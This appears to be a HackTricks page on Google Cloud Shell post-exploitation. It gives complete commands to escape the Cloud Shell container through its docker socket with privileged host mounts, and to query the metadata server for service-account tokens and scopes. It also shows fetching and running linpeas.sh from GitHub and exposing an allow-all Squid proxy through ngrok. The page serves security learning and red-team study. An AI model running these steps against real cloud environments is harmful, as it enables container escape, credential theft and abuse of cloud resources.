Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert) ! Other ways to support HackTricks:
If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS !
Cloud Shell
For more information about Cloud Shell check:
page GCP - Cloud Shell Enum Container Escape
Note that the Google Cloud Shell runs inside a container, you can easily escape to the host by doing:
Copy sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
Moreover, notice that from the host you can find a service account token:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
With the following scopes:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
Enumerate metadata with LinPEAS:
Copy cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
After using https://github.com/carlospolop/bf_my_gcp_permissions with the token of the Service Account no permission was discovered ...
Use it as Proxy
If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):
Copy sudo apt install -y squid
Just for let you know Squid is a http proxy server. Create a squid.conf file with the following settings:
Copy http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0 .0.0/0
http_access allow all
copy the squid.conf file to /etc/squid
Copy sudo cp squid.conf /etc/squid
Finally run the squid service:
Copy sudo service squid start
Use ngrok to let the proxy be available from outside:
After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).
For better use at startup the .bashrc file should have the following lines:
Copy sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert) ! Other ways to support HackTricks:
If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS !
Last updated 2 months ago